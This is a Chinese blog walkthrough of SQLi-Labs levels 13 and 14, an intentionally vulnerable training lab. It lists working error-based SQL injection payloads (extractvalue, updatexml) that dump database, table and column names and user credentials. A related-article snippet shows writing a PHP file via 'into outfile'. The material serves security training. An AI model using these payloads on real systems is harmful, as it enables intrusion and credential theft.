SqliLabs Less13-14

最新推荐文章于 2024-08-14 16:42:19 发布
最新推荐文章于 2024-08-14 16:42:19 发布
阅读量73 收藏
点赞数 1
分类专栏: Sqli Labs 文章标签: 大数据 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/125728434
版权

第十三关

 

    POST类型基于单引号和括号的的双重注入

1.同十二关一样加上 ’)#     

 uname=a')#&passwd=123&submit=Submit

2.判断列数为2

 uname=a') order by 3#&passwd=123&submit=Submit

 3.在输入联合查询时无果,尝试用特殊函数

 4.利用extractvalue(文档名称,文档路径)函数传递参数的固有性来制造错误,从而实现注入,下图为爆库操作

   注意:0x7e是~的ASCLL码值

uname=a')and extractvalue(1,concat(0x7e,database()))#&passwd=123&submit=Submit

 5.爆表(注意括弧数量)

uname=a')and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#&passwd=123&submit=Submit

 6.爆列

uname=a')and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'emails')))#&passwd=123&submit=Submit

 7.爆数据

通过limit0,1进行查询(limit0,1表示从你的表中的第0个数据开始,只读取1个)

把group_concat改为concat函数,这样做的目的是使用limit 0,1 进行逐个查询

uname=a')and extractvalue(1,concat(0x7e,(select concat(id,' ',email_id) from emails limit 1,1)))#&passwd=123&submit=Submit

 

第十四关

题目与十三关一样,但输入单引号无响应直接被骗,应输入双引号报错

用#注释掉后面的,接下来就又是那一套了

1.判断列数

uname=a" order by 3#&passwd=123&submit=Submit

   在3时报错,判断结果为2列

2.爆库

uname=a" and updatexml(1,concat(0x7e,database()),3) #&passwd=123&submit=Submit

 3.爆表

uname=a"and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),3)#&passwd=123&submit=Submit

 4.爆列

uname=a" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users') ),3)#&passwd=123&submit=Submit

 5.爆数据

uname=a" and updatexml(1,concat(0x7e,(select concat(id,' ',username,' ',password) from users limit 0,1) ),3)#&passwd=123&submit=Submit

 

xiao飞仔
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SqliLabs Less26-26a
qq_45785324的博客
07-20 657
SqliLabs Less26 Less26a
SQLI-LABS Less-13 到 Less-14
Web学习之路
03-24 122
联合注入
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 971
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
Sqlilabs Less-11
Light_inthe_eyes的博客
03-03 120
这关开始就变成登录画面了 先来尝试一个弱口令,用户admin密码admin,登录成功: 用burpsuite抓包进行接下来的操作 判断出是单引号字符型注入: uname=admin'#&passwd=&submit=Submit 判断列数: uname=admin'+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin'+union+select+database(),version()#&passwd=&s
Sqlilabs Less-18
Light_inthe_eyes的博客
03-07 4501
进入页面后,页面有提醒IP ADDRESS,如果对http比较熟悉的话,可以联想到http中的referer、XFF、useragent,在注入中,也可以叫异常Method注入。 用burpsuite抓包,查看请求头中的信息,发现回显了user-agent的信息,猜测此题的注入点在user-agent在user-agent中加入单引号,证实注入点位置的猜测: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/201001
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
sqli-labs-master:7878/Less-1/?id=-1'order by 3--+ ``` 如果页面正常显示,则表示该表至少有三列;如果页面显示错误,则说明少于三列。 **步骤2:获取数据库名称** 利用`union select`语句来提取数据库名称。示例...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Spark MLlib 特征工程(上)
最新发布
08-14 701
特征选择的动机,在于提取与预测标的关联度更高的特征,从而精简模型尺寸、提升模型泛化能力。特征选择可以从两方面入手,业务出发的专家经验和基于数据的统计分析。归一化的目的,在于去掉不同特征之间量纲的影响,避免量纲不一致而导致的梯度下降震荡、模型收敛效率低下等问题。归一化的具体法,是把不同特征都缩放到同一个值域。在这方面,Spark MLlib 提供了多种归一化方法供开发者选择。
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 601
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端。
[免费]适用于 Windows 10 的十大数据恢复软件
qq_23996309的博客
08-12 1126
Windows 10 是 Microsoft 开发的跨平台和设备应用程序操作系统。它启动速度更快,具有熟悉且扩展的“开始”菜单,甚至可以在多台设备上以新的方式工作。因此,Windows 10 非常受欢迎,我们用它来保存照片、音乐、文档和更多文件。但有时,由于意外删除、格式化、清空回收站、磁盘显示为 RAW、病毒攻击等原因,数据会丢失。此时,适用于 Windows 10 的数据恢复软件是您的最佳选择。
SparkSQL
m0_73745224的博客
08-13 892
sparkSQL操作各种数据
Kafka 的 ISR 机制
weixin_43281498的博客
08-11 381
在 0.9.x 之前的版本,Kafka 有一个核心的参数 :replica.lag.max.messages 表示如果 Follower 落后 Leader 的消息数量超过了这个参数值,就认为 Follower 就会从 ISR 列表里移除。由于 ISR 中的副本与之前的领导副本保持同步,新的领导副本能够继续提供服务,而不会丢失数据。当追随者副本追上了领导副本的日志进度(即达到了与领导副本相同的日志偏移量),领导副本会将其重新加入ISR。具体的 ISR 列表维护机制在不同的 Kafka 版本中有所变化。
Elasticsearch 创建索引库指南
一起coding,一起嗨。
08-11 346
Elasticsearch 创建索引库指南
列式数据库(HBase) 中实现表与表的关联
canduecho的专栏
08-09 456
在 HBase 中,表与表之间的关联查询不像关系型数据库那样可以直接使用JOIN操作。相反,你需要在应用层进行两次查询来实现关联。
【论文阅读笔记】ZooKeeper: Wait-free coordination for Internet-scale systems
pursuit的博客
08-11 434
这篇论文介绍了ZooKeeper,一个用于协调分布式应用进程的服务。ZooKeeper旨在提供一个简单且高性能的内核,用于构建更复杂的客户端协调原语。它整合了组消息传递、共享寄存器和分布式锁服务的元素,形成了一个复制的、集中式的服务。Zookeeper提供了一个接口,具有共享寄存器的无等待特性和类似分布式文件系统缓存失效的事件驱动机制,以提供简单而强大的协调服务。ZooKeeper还保证了每个客户端请求的FIFO执行和所有更改ZooKeeper状态的请求的线性化。分布式系统中的基本协调机制配置。
美团面经到店研发
m0_74229735的博客
08-10 1092
原理:Hash索引使用哈希表来存储索引键和对应的记录指针。当进行索引查找时,它会计算索引键的哈希值,然后通过哈希表查找对应的记录。优势查找速度快:哈希表的查找时间复杂度为O(1),因此Hash索引的查找速度非常快。不需要排序:由于查找基于哈希值,因此不需要对数据进行排序。劣势不支持范围查询:Hash索引不支持范围查询,因为它基于哈希值,而不是数据本身的顺序。无法利用索引进行排序:由于索引是基于哈希值的,所以无法直接利用索引进行排序。
sqli-labs-less-7
09-26
在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值